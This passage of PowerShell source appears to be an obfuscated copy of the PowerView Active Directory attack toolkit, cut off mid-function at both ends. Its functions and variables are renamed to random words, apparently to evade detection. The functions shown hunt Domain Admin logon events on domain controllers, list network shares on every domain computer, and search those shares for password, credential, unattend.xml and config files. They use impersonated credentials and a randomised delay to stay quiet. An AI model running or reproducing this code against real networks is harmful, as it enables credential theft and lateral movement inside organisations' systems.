Start-Sleep -Seconds $RDTxeQJK99.Next((1-$UtMZIcCR99)*$Delay, (1+$UtMZIcCR99)*$Delay) | |
Write-Verbose "[wearing] Enumerating server $njgHvCfM99 ($MJwBTCZE99 of $($wzcPABym99.count))" | |
$jdzRPRXs99 = Invoke-Command -xWxMuRFl99 $OprJRfCy99 -ArgumentList $njgHvCfM99, $mCMYMzbg99, $BsVgIpDt99, $KWcDeQDF99 | |
$jdzRPRXs99 | |
if ($jdzRPRXs99 -and $ezYFkWGM99) { | |
Write-Verbose "[wearing] Target user found, returning early" | |
return | |
} | |
} | |
} | |
else { | |
Write-Verbose "[wearing] Using threading with threads: $TwXZTXel99" | |
$coxNBeiD99 = @{ | |
'ProcessName' = $mCMYMzbg99 | |
'TargetUsers' = $BsVgIpDt99 | |
'Credential' = $KWcDeQDF99 | |
} | |
lowness -MqGzGCsi99 $wzcPABym99 -xWxMuRFl99 $OprJRfCy99 -yvvaxqfq99 $coxNBeiD99 -TwXZTXel99 $TwXZTXel99 | |
} | |
} | |
} | |
function ciabatta { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUsePSCredentialType', '')] | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPlainTextForPassword', '')] | |
[OutputType('PowerView.LogonEvent')] | |
[OutputType('PowerView.ExplicitCredentialLogon')] | |
[CmdletBinding(DefaultParameterSetName = 'Domain')] | |
Param( | |
[Parameter(ParameterSetName = 'ComputerName', Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('dnshostname', 'HostName', 'name')] | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$MqGzGCsi99, | |
[Parameter(ParameterSetName = 'Domain')] | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[ValidateNotNullOrEmpty()] | |
[Hashtable] | |
$IUDzHsEr99, | |
[Parameter(ValueFromPipelineByPropertyName = $True)] | |
[ValidateNotNullOrEmpty()] | |
[DateTime] | |
$NWuQTklg99 = [DateTime]::Now.AddDays(-1), | |
[Parameter(ValueFromPipelineByPropertyName = $True)] | |
[ValidateNotNullOrEmpty()] | |
[DateTime] | |
$EFIZkPxX99 = [DateTime]::Now, | |
[ValidateRange(1, 1000000)] | |
[Int] | |
$Tswoyjjp99 = 5000, | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$CiKxrVpf99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$VeuSFWRJ99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$wcJymsGC99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$qafsmway99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('GroupName', 'Group')] | |
[String[]] | |
$qUmAkowy99 = 'Domain Admins', | |
[Alias('AdminCount')] | |
[Switch] | |
$LnOcabyx99, | |
[Switch] | |
$sHBhehfI99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateSet('Base', 'OneLevel', 'Subtree')] | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[Switch] | |
$DPTKXMKA99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty, | |
[Switch] | |
$ezYFkWGM99, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$Delay = 0, | |
[ValidateRange(0.0, 1.0)] | |
[Double] | |
$UtMZIcCR99 = .3, | |
[Int] | |
[ValidateRange(1, 100)] | |
$TwXZTXel99 = 20 | |
) | |
BEGIN { | |
$hZyutCHb99 = @{ | |
'Properties' = 'samaccountname' | |
} | |
if ($PSBoundParameters['UserIdentity']) { $hZyutCHb99['Identity'] = $CiKxrVpf99 } | |
if ($PSBoundParameters['UserDomain']) { $hZyutCHb99['Domain'] = $VeuSFWRJ99 } | |
if ($PSBoundParameters['UserLDAPFilter']) { $hZyutCHb99['LDAPFilter'] = $wcJymsGC99 } | |
if ($PSBoundParameters['UserSearchBase']) { $hZyutCHb99['SearchBase'] = $qafsmway99 } | |
if ($PSBoundParameters['UserAdminCount']) { $hZyutCHb99['AdminCount'] = $LnOcabyx99 } | |
if ($PSBoundParameters['Server']) { $hZyutCHb99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $hZyutCHb99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $hZyutCHb99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $hZyutCHb99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Tombstone']) { $hZyutCHb99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $hZyutCHb99['Credential'] = $KWcDeQDF99 } | |
if ($PSBoundParameters['UserIdentity'] -or $PSBoundParameters['UserLDAPFilter'] -or $PSBoundParameters['UserSearchBase'] -or $PSBoundParameters['UserAdminCount']) { | |
$BsVgIpDt99 = horseshoed @UserSearcherArguments | Select-Object -ExpandProperty samaccountname | |
} | |
elseif ($PSBoundParameters['UserGroupIdentity'] -or (-not $PSBoundParameters['Filter'])) { | |
$EzfMwVeQ99 = @{ | |
'Identity' = $qUmAkowy99 | |
'Recurse' = $True | |
} | |
Write-Verbose "UserGroupIdentity: $qUmAkowy99" | |
if ($PSBoundParameters['UserDomain']) { $EzfMwVeQ99['Domain'] = $VeuSFWRJ99 } | |
if ($PSBoundParameters['UserSearchBase']) { $EzfMwVeQ99['SearchBase'] = $qafsmway99 } | |
if ($PSBoundParameters['Server']) { $EzfMwVeQ99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $EzfMwVeQ99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $EzfMwVeQ99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $EzfMwVeQ99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Tombstone']) { $EzfMwVeQ99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $EzfMwVeQ99['Credential'] = $KWcDeQDF99 } | |
$BsVgIpDt99 = paltriest @GroupSearcherArguments | Select-Object -ExpandProperty MemberName | |
} | |
if ($PSBoundParameters['ComputerName']) { | |
$wzcPABym99 = $MqGzGCsi99 | |
} | |
else { | |
$pSocivmu99 = @{ | |
'LDAP' = $True | |
} | |
if ($PSBoundParameters['Domain']) { $pSocivmu99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['Server']) { $pSocivmu99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['Credential']) { $pSocivmu99['Credential'] = $KWcDeQDF99 } | |
Write-Verbose "[ciabatta] Querying for domain controllers in domain: $ADDDGomQ99" | |
$wzcPABym99 = Moloch @DCSearcherArguments | Select-Object -ExpandProperty dnshostname | |
} | |
if ($wzcPABym99 -and ($wzcPABym99 -isnot [System.Array])) { | |
$wzcPABym99 = @(,$wzcPABym99) | |
} | |
Write-Verbose "[ciabatta] TargetComputers length: $($wzcPABym99.Length)" | |
Write-Verbose "[ciabatta] TargetComputers $wzcPABym99" | |
if ($wzcPABym99.Length -eq 0) { | |
throw '[ciabatta] No hosts found to enumerate' | |
} | |
$OprJRfCy99 = { | |
Param($MqGzGCsi99, $NWuQTklg99, $EFIZkPxX99, $Tswoyjjp99, $BsVgIpDt99, $IUDzHsEr99, $KWcDeQDF99) | |
ForEach ($njgHvCfM99 in $MqGzGCsi99) { | |
$Up = Test-Connection -Count 1 -Quiet -MqGzGCsi99 $njgHvCfM99 | |
if ($Up) { | |
$MuEFrYxj99 = @{ | |
'ComputerName' = $njgHvCfM99 | |
} | |
if ($NWuQTklg99) { $MuEFrYxj99['StartTime'] = $NWuQTklg99 } | |
if ($EFIZkPxX99) { $MuEFrYxj99['EndTime'] = $EFIZkPxX99 } | |
if ($Tswoyjjp99) { $MuEFrYxj99['MaxEvents'] = $Tswoyjjp99 } | |
if ($KWcDeQDF99) { $MuEFrYxj99['Credential'] = $KWcDeQDF99 } | |
if ($IUDzHsEr99 -or $BsVgIpDt99) { | |
if ($BsVgIpDt99) { | |
lunges @DomainUserEventArgs | Where-Object {$BsVgIpDt99 -contains $_.TargetUserName} | |
} | |
else { | |
$FSqydsOs99 = 'or' | |
$IUDzHsEr99.Keys | ForEach-Object { | |
if (($_ -eq 'Op') -or ($_ -eq 'Operator') -or ($_ -eq 'Operation')) { | |
if (($IUDzHsEr99[$_] -match '&') -or ($IUDzHsEr99[$_] -eq 'and')) { | |
$FSqydsOs99 = 'and' | |
} | |
} | |
} | |
$Keys = $IUDzHsEr99.Keys | Where-Object {($_ -ne 'Op') -and ($_ -ne 'Operator') -and ($_ -ne 'Operation')} | |
lunges @DomainUserEventArgs | ForEach-Object { | |
if ($FSqydsOs99 -eq 'or') { | |
ForEach ($Key in $Keys) { | |
if ($_."$Key" -match $IUDzHsEr99[$Key]) { | |
$_ | |
} | |
} | |
} | |
else { | |
ForEach ($Key in $Keys) { | |
if ($_."$Key" -notmatch $IUDzHsEr99[$Key]) { | |
break | |
} | |
$_ | |
} | |
} | |
} | |
} | |
} | |
else { | |
lunges @DomainUserEventArgs | |
} | |
} | |
} | |
} | |
} | |
PROCESS { | |
if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { | |
Write-Verbose "[ciabatta] Total number of hosts: $($wzcPABym99.count)" | |
Write-Verbose "[ciabatta] Delay: $Delay, Jitter: $UtMZIcCR99" | |
$MJwBTCZE99 = 0 | |
$RDTxeQJK99 = New-Object System.Random | |
ForEach ($njgHvCfM99 in $wzcPABym99) { | |
$MJwBTCZE99 = $MJwBTCZE99 + 1 | |
Start-Sleep -Seconds $RDTxeQJK99.Next((1-$UtMZIcCR99)*$Delay, (1+$UtMZIcCR99)*$Delay) | |
Write-Verbose "[ciabatta] Enumerating server $njgHvCfM99 ($MJwBTCZE99 of $($wzcPABym99.count))" | |
$jdzRPRXs99 = Invoke-Command -xWxMuRFl99 $OprJRfCy99 -ArgumentList $njgHvCfM99, $NWuQTklg99, $EFIZkPxX99, $Tswoyjjp99, $BsVgIpDt99, $IUDzHsEr99, $KWcDeQDF99 | |
$jdzRPRXs99 | |
if ($jdzRPRXs99 -and $ezYFkWGM99) { | |
Write-Verbose "[ciabatta] Target user found, returning early" | |
return | |
} | |
} | |
} | |
else { | |
Write-Verbose "[ciabatta] Using threading with threads: $TwXZTXel99" | |
$coxNBeiD99 = @{ | |
'StartTime' = $NWuQTklg99 | |
'EndTime' = $EFIZkPxX99 | |
'MaxEvents' = $Tswoyjjp99 | |
'TargetUsers' = $BsVgIpDt99 | |
'Filter' = $IUDzHsEr99 | |
'Credential' = $KWcDeQDF99 | |
} | |
lowness -MqGzGCsi99 $wzcPABym99 -xWxMuRFl99 $OprJRfCy99 -yvvaxqfq99 $coxNBeiD99 -TwXZTXel99 $TwXZTXel99 | |
} | |
} | |
} | |
function dodges { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('PowerView.ShareInfo')] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('DNSHostName')] | |
[String[]] | |
$MqGzGCsi99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('Domain')] | |
[String] | |
$LqbSENtU99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$nNRsMphX99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$unLXfRCu99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('OperatingSystem')] | |
[String] | |
$TBhTtASh99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('ServicePack')] | |
[String] | |
$INxaoAdc99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('SiteName')] | |
[String] | |
$VYLOaTCe99, | |
[Alias('CheckAccess')] | |
[Switch] | |
$IoZSPCBb99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateSet('Base', 'OneLevel', 'Subtree')] | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[Switch] | |
$DPTKXMKA99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$Delay = 0, | |
[ValidateRange(0.0, 1.0)] | |
[Double] | |
$UtMZIcCR99 = .3, | |
[Int] | |
[ValidateRange(1, 100)] | |
$TwXZTXel99 = 20 | |
) | |
BEGIN { | |
$uRLeBwzL99 = @{ | |
'Properties' = 'dnshostname' | |
} | |
if ($PSBoundParameters['ComputerDomain']) { $uRLeBwzL99['Domain'] = $LqbSENtU99 } | |
if ($PSBoundParameters['ComputerLDAPFilter']) { $uRLeBwzL99['LDAPFilter'] = $nNRsMphX99 } | |
if ($PSBoundParameters['ComputerSearchBase']) { $uRLeBwzL99['SearchBase'] = $unLXfRCu99 } | |
if ($PSBoundParameters['Unconstrained']) { $uRLeBwzL99['Unconstrained'] = $CLwptSbP99 } | |
if ($PSBoundParameters['ComputerOperatingSystem']) { $uRLeBwzL99['OperatingSystem'] = $IRUHhYmI99 } | |
if ($PSBoundParameters['ComputerServicePack']) { $uRLeBwzL99['ServicePack'] = $hKzwkfzE99 } | |
if ($PSBoundParameters['ComputerSiteName']) { $uRLeBwzL99['SiteName'] = $ZbNKanPP99 } | |
if ($PSBoundParameters['Server']) { $uRLeBwzL99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $uRLeBwzL99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $uRLeBwzL99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $uRLeBwzL99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Tombstone']) { $uRLeBwzL99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $uRLeBwzL99['Credential'] = $KWcDeQDF99 } | |
if ($PSBoundParameters['ComputerName']) { | |
$wzcPABym99 = $MqGzGCsi99 | |
} | |
else { | |
Write-Verbose '[dodges] Querying computers in the domain' | |
$wzcPABym99 = deputes @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname | |
} | |
Write-Verbose "[dodges] TargetComputers length: $($wzcPABym99.Length)" | |
if ($wzcPABym99.Length -eq 0) { | |
throw '[dodges] No hosts found to enumerate' | |
} | |
$OprJRfCy99 = { | |
Param($MqGzGCsi99, $IoZSPCBb99, $iLRvFQhH99) | |
if ($iLRvFQhH99) { | |
$Null = purveyed -iLRvFQhH99 $iLRvFQhH99 -Quiet | |
} | |
ForEach ($njgHvCfM99 in $MqGzGCsi99) { | |
$Up = Test-Connection -Count 1 -Quiet -MqGzGCsi99 $njgHvCfM99 | |
if ($Up) { | |
$wughGQfL99 = snarkier -MqGzGCsi99 $njgHvCfM99 | |
ForEach ($Share in $wughGQfL99) { | |
$CkweMaGz99 = $Share.Name | |
$Path = '\\'+$njgHvCfM99+'\'+$CkweMaGz99 | |
if (($CkweMaGz99) -and ($CkweMaGz99.trim() -ne '')) { | |
if ($IoZSPCBb99) { | |
try { | |
$Null = [IO.Directory]::GetFiles($Path) | |
$Share | |
} | |
catch { | |
Write-Verbose "Error accessing share path $Path : $_" | |
} | |
} | |
else { | |
$Share | |
} | |
} | |
} | |
} | |
} | |
if ($iLRvFQhH99) { | |
sepal | |
} | |
} | |
$aiSfwOXj99 = $Null | |
if ($PSBoundParameters['Credential']) { | |
if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { | |
$aiSfwOXj99 = purveyed -KWcDeQDF99 $KWcDeQDF99 | |
} | |
else { | |
$aiSfwOXj99 = purveyed -KWcDeQDF99 $KWcDeQDF99 -Quiet | |
} | |
} | |
} | |
PROCESS { | |
if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { | |
Write-Verbose "[dodges] Total number of hosts: $($wzcPABym99.count)" | |
Write-Verbose "[dodges] Delay: $Delay, Jitter: $UtMZIcCR99" | |
$MJwBTCZE99 = 0 | |
$RDTxeQJK99 = New-Object System.Random | |
ForEach ($njgHvCfM99 in $wzcPABym99) { | |
$MJwBTCZE99 = $MJwBTCZE99 + 1 | |
Start-Sleep -Seconds $RDTxeQJK99.Next((1-$UtMZIcCR99)*$Delay, (1+$UtMZIcCR99)*$Delay) | |
Write-Verbose "[dodges] Enumerating server $njgHvCfM99 ($MJwBTCZE99 of $($wzcPABym99.count))" | |
Invoke-Command -xWxMuRFl99 $OprJRfCy99 -ArgumentList $njgHvCfM99, $IoZSPCBb99, $aiSfwOXj99 | |
} | |
} | |
else { | |
Write-Verbose "[dodges] Using threading with threads: $TwXZTXel99" | |
$coxNBeiD99 = @{ | |
'CheckShareAccess' = $IoZSPCBb99 | |
'TokenHandle' = $aiSfwOXj99 | |
} | |
lowness -MqGzGCsi99 $wzcPABym99 -xWxMuRFl99 $OprJRfCy99 -yvvaxqfq99 $coxNBeiD99 -TwXZTXel99 $TwXZTXel99 | |
} | |
} | |
END { | |
if ($aiSfwOXj99) { | |
sepal -iLRvFQhH99 $aiSfwOXj99 | |
} | |
} | |
} | |
function suggests { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('PowerView.FoundFile')] | |
[CmdletBinding(DefaultParameterSetName = 'FileSpecification')] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('DNSHostName')] | |
[String[]] | |
$MqGzGCsi99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$LqbSENtU99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$nNRsMphX99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$unLXfRCu99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('OperatingSystem')] | |
[String] | |
$TBhTtASh99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('ServicePack')] | |
[String] | |
$INxaoAdc99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('SiteName')] | |
[String] | |
$VYLOaTCe99, | |
[Parameter(ParameterSetName = 'FileSpecification')] | |
[ValidateNotNullOrEmpty()] | |
[Alias('SearchTerms', 'Terms')] | |
[String[]] | |
$ahDHFGaL99 = @('*password*', '*sensitive*', '*admin*', '*login*', '*secret*', 'unattend*.xml', '*.vmdk', '*creds*', '*credential*', '*.config'), | |
[ValidateNotNullOrEmpty()] | |
[ValidatePattern('\\\\')] | |
[Alias('Share')] | |
[String[]] | |
$FKMKXrxR99, | |
[String[]] | |
$fqlvxfzy99 = @('C$', 'Admin$', 'Print$', 'IPC$'), | |
[Parameter(ParameterSetName = 'FileSpecification')] | |
[ValidateNotNullOrEmpty()] | |
[DateTime] | |
$UKoebrqd99, | |
[Parameter(ParameterSetName = 'FileSpecification')] | |
[ValidateNotNullOrEmpty()] | |
[DateTime] | |
$YosUbzPQ99, | |
[Parameter(ParameterSetName = 'FileSpecification')] | |
[ValidateNotNullOrEmpty()] | |
[DateTime] | |
$PxNkSvQV99, | |
[Parameter(ParameterSetName = 'OfficeDocs')] | |
[Switch] | |
$JtrfgRAO99, | |
[Parameter(ParameterSetName = 'FreshEXEs')] | |
[Switch] | |
$XXaaALNN99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateSet('Base', 'OneLevel', 'Subtree')] | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[Switch] | |
$DPTKXMKA99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$Delay = 0, | |
[ValidateRange(0.0, 1.0)] | |
[Double] | |
$UtMZIcCR99 = .3, | |
[Int] | |
[ValidateRange(1, 100)] | |
$TwXZTXel99 = 20 | |
) | |
BEGIN { | |
$uRLeBwzL99 = @{ | |
'Properties' = 'dnshostname' | |
} | |
if ($PSBoundParameters['ComputerDomain']) { $uRLeBwzL99['Domain'] = $LqbSENtU99 } | |
if ($PSBoundParameters['ComputerLDAPFilter']) { $uRLeBwzL99['LDAPFilter'] = $nNRsMphX99 } | |
if ($PSBoundParameters['ComputerSearchBase']) { $uRLeBwzL99['SearchBase'] = $unLXfRCu99 } | |
if ($PSBoundParameters['ComputerOperatingSystem']) { $uRLeBwzL99['OperatingSystem'] = $IRUHhYmI99 } | |
if ($PSBoundParameters['ComputerServicePack']) { $uRLeBwzL99['ServicePack'] = $hKzwkfzE99 } | |
if ($PSBoundParameters['ComputerSiteName']) { $uRLeBwzL99['SiteName'] = $ZbNKanPP99 } | |
if ($PSBoundParameters['Server']) { $uRLeBwzL99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $uRLeBwzL99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $uRLeBwzL99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $uRLeBwzL99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Tombstone']) { $uRLeBwzL99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $uRLeBwzL99['Credential'] = $KWcDeQDF99 } | |
if ($PSBoundParameters['ComputerName']) { | |
$wzcPABym99 = $MqGzGCsi99 | |
} | |
else { | |
Write-Verbose '[suggests] Querying computers in the domain' | |
$wzcPABym99 = deputes @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname | |
} | |
Write-Verbose "[suggests] TargetComputers length: $($wzcPABym99.Length)" | |
if ($wzcPABym99.Length -eq 0) { | |
throw '[suggests] No hosts found to enumerate' | |
} | |
$OprJRfCy99 = { | |
Param($MqGzGCsi99, $ahDHFGaL99, $fqlvxfzy99, $JtrfgRAO99, $qWyEjPAZ99, $XXaaALNN99, $iHrKHCFv99, $iLRvFQhH99) | |
if ($iLRvFQhH99) { | |
$Null = purveyed -iLRvFQhH99 $iLRvFQhH99 -Quiet | |
} | |
ForEach ($njgHvCfM99 in $MqGzGCsi99) { | |
$xWBUcUNl99 = @() | |
if ($njgHvCfM99.StartsWith('\\')) { | |
$xWBUcUNl99 += $njgHvCfM99 | |
} | |
else { | |
$Up = Test-Connection -Count 1 -Quiet -MqGzGCsi99 $njgHvCfM99 | |
if ($Up) { | |
$wughGQfL99 = snarkier -MqGzGCsi99 $njgHvCfM99 | |
ForEach ($Share in $wughGQfL99) { | |
$CkweMaGz99 = $Share.Name | |
$Path = '\\'+$njgHvCfM99+'\'+$CkweMaGz99 | |
if (($CkweMaGz99) -and ($CkweMaGz99.Trim() -ne '')) { | |
if ($fqlvxfzy99 -NotContains $CkweMaGz99) { | |
try { | |
$Null = [IO.Directory]::GetFiles($Path) | |
$xWBUcUNl99 += $Path | |
} | |
catch { | |
Write-Verbose "[!] No access to $Path" | |
} | |
} | |
} | |
} | |
} | |
} | |
ForEach ($Share in $xWBUcUNl99) { | |
Write-Verbose "Searching share: $Share" | |
$tsecBXhh99 = @{ | |
'Path' = $Share | |
'Include' = $ahDHFGaL99 | |
} | |
if ($JtrfgRAO99) { | |
$tsecBXhh99['OfficeDocs'] = $JtrfgRAO99 | |
} | |
if ($XXaaALNN99) { | |
$tsecBXhh99['FreshEXEs'] = $XXaaALNN99 | |
} | |
if ($UKoebrqd99) { | |
$tsecBXhh99['LastAccessTime'] = $UKoebrqd99 | |
} | |
if ($YosUbzPQ99) { | |
$tsecBXhh99['LastWriteTime'] = $YosUbzPQ99 | |
} | |
if ($PxNkSvQV99) { | |
$tsecBXhh99['CreationTime'] = $PxNkSvQV99 | |
} | |
if ($iHrKHCFv99) { | |
$tsecBXhh99['CheckWriteAccess'] = $iHrKHCFv99 | |
} | |
extremes @SearchArgs | |
} | |
} | |
if ($iLRvFQhH99) { | |
sepal | |
} | |
} | |
$aiSfwOXj99 = $Null | |
if ($PSBoundParameters['Credential']) { | |
if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { | |
$aiSfwOXj99 = purveyed -KWcDeQDF99 $KWcDeQDF99 | |
} | |
else { | |
$aiSfwOXj99 = purveyed -KWcDeQDF99 $KWcDeQDF99 -Quiet | |
} | |
} | |
} | |
PROCESS { | |
if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { | |
Write-Verbose "[suggests] Total number of hosts: $($wzcPABym99.count)" | |
Write-Verbose "[suggests] Delay: $Delay, Jitter: $UtMZIcCR99" | |
$MJwBTCZE99 = 0 | |
$RDTxeQJK99 = New-Object System.Random | |
ForEach ($njgHvCfM99 in $wzcPABym99) { | |
$MJwBTCZE99 = $MJwBTCZE99 + 1 | |
Start-Sleep -Seconds $RDTxeQJK99.Next((1-$UtMZIcCR99)*$Delay, (1+$UtMZIcCR99)*$Delay) | |
Write-Verbose "[suggests] Enumerating server $njgHvCfM99 ($MJwBTCZE99 of $($wzcPABym99.count))" | |
Invoke-Command -xWxMuRFl99 $OprJRfCy99 -ArgumentList $njgHvCfM99, $ahDHFGaL99, $fqlvxfzy99, $JtrfgRAO99, $qWyEjPAZ99, $XXaaALNN99, $iHrKHCFv99, $aiSfwOXj99 | |
} | |
} | |
else { | |
Write-Verbose "[suggests] Using threading with threads: $TwXZTXel99" | |
$coxNBeiD99 = @{ | |
'Include' = $ahDHFGaL99 | |
'ExcludedShares' = $fqlvxfzy99 | |
'OfficeDocs' = $JtrfgRAO99 | |
'ExcludeHidden' = $qWyEjPAZ99 | |
'FreshEXEs' = $XXaaALNN99 | |
'CheckWriteAccess' = $iHrKHCFv99 | |
'TokenHandle' = $aiSfwOXj99 | |
} | |
lowness -MqGzGCsi99 $wzcPABym99 -xWxMuRFl99 $OprJRfCy99 -yvvaxqfq99 $coxNBeiD99 -TwXZTXel99 $TwXZTXel99 | |
} | |
} | |
END { | |
if ($aiSfwOXj99) { | |
sepal -iLRvFQhH99 $aiSfwOXj99 | |
} | |
} | |
} | |
function variegated { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType([String])] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('DNSHostName')] | |
[String[]] | |
$MqGzGCsi99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$LqbSENtU99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$nNRsMphX99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$unLXfRCu99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('OperatingSystem')] | |
[String] | |
$TBhTtASh99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('ServicePack')] | |
[String] | |
$INxaoAdc99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('SiteName')] | |
[String] | |
$VYLOaTCe99, | |
[Switch] | |
$IoZSPCBb99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateSet('Base', 'OneLevel', 'Subtree')] | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[Switch] | |
$DPTKXMKA99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$Delay = 0, | |
[ValidateRange(0.0, 1.0)] | |
[Double] | |
$UtMZIcCR99 = .3, | |
[Int] | |
[ValidateRange(1, 100)] | |
$TwXZTXel99 = 20 | |
) | |
BEGIN { | |
$uRLeBwzL99 = @{ | |
'Properties' = 'dnshostname' | |
} | |
if ($PSBoundParameters['ComputerDomain']) { $uRLeBwzL99['Domain'] = $LqbSENtU99 } | |
if ($PSBoundParameters['ComputerLDAPFilter']) { $uRLeBwzL99['LDAPFilter'] = $nNRsMphX99 } | |
if ($PSBoundParameters['ComputerSearchBase']) { $uRLeBwzL99['SearchBase'] = $unLXfRCu99 } | |
if ($PSBoundParameters['Unconstrained']) { $uRLeBwzL99['Unconstrained'] = $CLwptSbP99 } | |
if ($PSBoundParameters['ComputerOperatingSystem']) { $uRLeBwzL99['OperatingSystem'] = $IRUHhYmI99 } | |
if ($PSBoundParameters['ComputerServicePack']) { $uRLeBwzL99['ServicePack'] = $hKzwkfzE99 } | |
if ($PSBoundParameters['ComputerSiteName']) { $uRLeBwzL99['SiteName'] = $ZbNKanPP99 } | |
